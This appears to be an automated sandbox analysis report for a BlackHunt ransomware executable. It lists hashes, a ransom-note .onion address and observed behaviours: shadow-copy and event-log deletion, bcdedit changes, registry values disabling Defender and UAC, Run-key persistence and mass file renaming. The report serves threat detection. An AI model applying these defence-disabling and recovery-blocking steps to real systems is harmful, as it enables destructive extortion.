Analysis
-
max time kernel
118s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
19-01-2024 00:34
Static task
static1
Behavioral task
behavioral1
Sample
b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe
Resource
win10v2004-20231215-en
General
-
Target
b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe
-
Size
707KB
-
MD5
8eed345decf6e199db754e8f2ff9fd5d
-
SHA1
ddc7bb3230a986cf815e8081212be574efd3a5f2
-
SHA256
b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89
-
SHA512
7a980958b09677efae737010f9dda408f2a13862a8e5beb06a3117e7436ed311faab2764e64cffb1742ac0025b50f9c87ff6dd2396d3c7fe505ee9d71a7c89bd
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza168Uvnh:6uaTmkZJ+naie5OTamgEoKxLWhqh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 2728 fsutil.exe 1564 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 3092 wevtutil.exe 692 wevtutil.exe 3436 wevtutil.exe 1636 wevtutil.exe 3584 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 2732 bcdedit.exe 2412 bcdedit.exe 3212 bcdedit.exe 3648 bcdedit.exe -
Renames multiple (2881) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 2468 wbadmin.exe 2156 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Deletes itself 1 IoCs
pid Process 2000 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\R: b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened (read-only) \??\H: b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened (read-only) \??\V: b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened (read-only) \??\Y: b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened (read-only) \??\A: b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened (read-only) \??\X: b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened (read-only) \??\N: b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened (read-only) \??\G: b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened (read-only) \??\K: b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened (read-only) \??\B: b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened (read-only) \??\Z: b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened (read-only) \??\M: b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened (read-only) \??\T: b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened (read-only) \??\O: b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened (read-only) \??\L: b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened (read-only) \??\W: b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened (read-only) \??\E: b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\P: b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened (read-only) \??\J: b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened (read-only) \??\Q: b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened (read-only) \??\U: b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened (read-only) \??\I: b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened (read-only) \??\S: b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\locale\#BlackHunt_Private.key b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File created C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\#BlackHunt_Private.key b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File created C:\Program Files\VideoLAN\VLC\locale\fa\#BlackHunt_ReadMe.hta b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\#BlackHunt_ReadMe.hta b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr\profile.jfc b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Gaza b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\feature.properties b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-explorer.xml b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-queries.xml b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File created C:\Program Files\VideoLAN\VLC\locale\be\#BlackHunt_ReadMe.txt b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File created C:\Program Files\VideoLAN\VLC\locale\be\#BlackHunt_ReadMe.hta b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\sysinfo b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File created C:\Program Files\VideoLAN\VLC\locale\ko\#BlackHunt_ReadMe.txt b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\CST6CDT b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-favorites_zh_CN.jar b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-multiview.jar b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File created C:\Program Files\VideoLAN\VLC\locale\sr\LC_MESSAGES\#BlackHunt_ReadMe.txt b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_CN\#BlackHunt_ReadMe.hta b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File created C:\Program Files\Java\jdk1.7.0_80\include\win32\#BlackHunt_ReadMe.hta b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_de.properties b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-compat.xml b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-9 b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File created C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\#BlackHunt_ReadMe.hta b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\VideoWall\#BlackHunt_ReadMe.txt b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Swift_Current b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Rome b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-jvmstat.xml b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\photoedge_selectionsubpicture.png b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\feature.xml b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.httpcomponents.httpclient_4.2.6.v201311072007.jar b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-core.xml b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_frame-border.png b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Notes_loop_PAL.wmv b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\custom.lua b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\DumontDUrville b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Troll b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\#BlackHunt_Private.key b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.transport.ecf.nl_zh_4.4.0.v20140623020002.jar b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened for modification C:\Program Files\7-Zip\Lang\eu.txt b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File created C:\Program Files\VideoLAN\VLC\locale\fr\LC_MESSAGES\#BlackHunt_Private.key b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\title_trans_notes.wmv b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\#BlackHunt_ReadMe.txt b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Boise b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\day-of-week-16.png b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.nl_ja_4.4.0.v20140623020002.jar b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-utilities.xml b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File created C:\Program Files\VideoLAN\VLC\locale\he\LC_MESSAGES\#BlackHunt_ReadMe.txt b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened for modification C:\Program Files\7-Zip\Lang\pt.txt b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.di.nl_ja_4.4.0.v20140623020002.jar b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-sendopts.xml b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-nodes.xml b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\vlc.mo b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File created C:\Program Files\VideoLAN\VLC\locale\is\#BlackHunt_ReadMe.txt b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Jayapura b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File created C:\Program Files\VideoLAN\VLC\plugins\codec\#BlackHunt_Private.key b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\#BlackHunt_ReadMe.hta b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.server_8.1.14.v20131031.jar b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Cuiaba b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\#BlackHunt_ReadMe.txt b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Karachi b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened for modification C:\Program Files\Java\jre7\lib\psfont.properties.ja b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.base.nl_ja_4.4.0.v20140623020002.jar b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe File created C:\Program Files\VideoLAN\VLC\locale\ach\#BlackHunt_Private.key b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 696 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2868 vssadmin.exe 2084 vssadmin.exe 2516 vssadmin.exe 2316 vssadmin.exe 936 vssadmin.exe 3052 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 4004 taskkill.exe -
Modifies registry class 10 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 conhost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ conhost.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3360 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 3532 mshta.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 2352 b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe Token: SeRestorePrivilege 2352 b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe Token: SeBackupPrivilege 2352 b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe Token: SeTakeOwnershipPrivilege 2352 b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe Token: SeAuditPrivilege 2352 b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe Token: SeSecurityPrivilege 2352 b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe Token: SeIncBasePriorityPrivilege 2352 b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe Token: SeBackupPrivilege 1444 vssvc.exe Token: SeRestorePrivilege 1444 vssvc.exe Token: SeAuditPrivilege 1444 vssvc.exe Token: SeBackupPrivilege 1392 wbengine.exe Token: SeRestorePrivilege 1392 wbengine.exe Token: SeSecurityPrivilege 1392 wbengine.exe Token: SeSecurityPrivilege 3092 wevtutil.exe Token: SeBackupPrivilege 3092 wevtutil.exe Token: SeSecurityPrivilege 692 wevtutil.exe Token: SeBackupPrivilege 692 wevtutil.exe Token: SeSecurityPrivilege 3436 wevtutil.exe Token: SeBackupPrivilege 3436 wevtutil.exe Token: SeSecurityPrivilege 1636 wevtutil.exe Token: SeBackupPrivilege 1636 wevtutil.exe Token: SeSecurityPrivilege 3584 wevtutil.exe Token: SeBackupPrivilege 3584 wevtutil.exe Token: SeDebugPrivilege 4004 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2352 wrote to memory of 2832 2352 b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe 92 PID 2352 wrote to memory of 2832 2352 b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe 92 PID 2352 wrote to memory of 2832 2352 b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe 92 PID 2352 wrote to memory of 2832 2352 b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe 92 PID 2352 wrote to memory of 2888 2352 b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe 88 PID 2352 wrote to memory of 2888 2352 b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe 88 PID 2352 wrote to memory of 2888 2352 b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe 88 PID 2352 wrote to memory of 2888 2352 b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe 88 PID 2352 wrote to memory of 2176 2352 b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe 31 PID 2352 wrote to memory of 2176 2352 b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe 31 PID 2352 wrote to memory of 2176 2352 b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe 31 PID 2352 wrote to memory of 2176 2352 b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe 31 PID 2832 wrote to memory of 1840 2832 cmd.exe 87 PID 2832 wrote to memory of 1840 2832 cmd.exe 87 PID 2832 wrote to memory of 1840 2832 cmd.exe 87 PID 2352 wrote to memory of 2776 2352 b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe 155 PID 2352 wrote to memory of 2776 2352 b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe 155 PID 2352 wrote to memory of 2776 2352 b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe 155 PID 2352 wrote to memory of 2776 2352 b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe 155 PID 2888 wrote to memory of 2116 2888 cmd.exe 34 PID 2888 wrote to memory of 2116 2888 cmd.exe 34 PID 2888 wrote to memory of 2116 2888 cmd.exe 34 PID 2352 wrote to memory of 2564 2352 b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe 33 PID 2352 wrote to memory of 2564 2352 b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe 33 PID 2352 wrote to memory of 2564 2352 b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe 33 PID 2352 wrote to memory of 2564 2352 b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe 33 PID 2176 wrote to memory of 2528 2176 cmd.exe 142 PID 2176 wrote to memory of 2528 2176 cmd.exe 142 PID 2176 wrote to memory of 2528 2176 cmd.exe 142 PID 2352 wrote to memory of 2624 2352 b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe 86 PID 2352 wrote to memory of 2624 2352 b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe 86 PID 2352 wrote to memory of 2624 2352 b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe 86 PID 2352 wrote to memory of 2624 2352 b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe 86 PID 2352 wrote to memory of 2652 2352 b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe 83 PID 2352 wrote to memory of 2652 2352 b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe 83 PID 2352 wrote to memory of 2652 2352 b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe 83 PID 2352 wrote to memory of 2652 2352 b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe 83 PID 2352 wrote to memory of 2576 2352 b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe 40 PID 2352 wrote to memory of 2576 2352 b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe 40 PID 2352 wrote to memory of 2576 2352 b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe 40 PID 2352 wrote to memory of 2576 2352 b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe 40 PID 2352 wrote to memory of 2668 2352 b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe 39 PID 2352 wrote to memory of 2668 2352 b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe 39 PID 2352 wrote to memory of 2668 2352 b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe 39 PID 2352 wrote to memory of 2668 2352 b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe 39 PID 2564 wrote to memory of 2428 2564 cmd.exe 49 PID 2564 wrote to memory of 2428 2564 cmd.exe 49 PID 2564 wrote to memory of 2428 2564 cmd.exe 49 PID 2352 wrote to memory of 2940 2352 b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe 41 PID 2352 wrote to memory of 2940 2352 b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe 41 PID 2352 wrote to memory of 2940 2352 b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe 41 PID 2352 wrote to memory of 2940 2352 b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe 41 PID 2352 wrote to memory of 2696 2352 b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe 42 PID 2352 wrote to memory of 2696 2352 b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe 42 PID 2352 wrote to memory of 2696 2352 b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe 42 PID 2352 wrote to memory of 2696 2352 b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe 42 PID 2352 wrote to memory of 2524 2352 b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe 46 PID 2352 wrote to memory of 2524 2352 b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe 46 PID 2352 wrote to memory of 2524 2352 b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe 46 PID 2352 wrote to memory of 2524 2352 b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe 46 PID 2776 wrote to memory of 2460 2776 wmiprvse.exe 47 PID 2776 wrote to memory of 2460 2776 wmiprvse.exe 47 PID 2776 wrote to memory of 2460 2776 wmiprvse.exe 47 PID 2352 wrote to memory of 2536 2352 b133fc4f6cd7305e897f80676342ddf820bce3436a0f8c654838ad141a634d89.exe 51 -
System policy modification 1 TTPs 3 IoCs
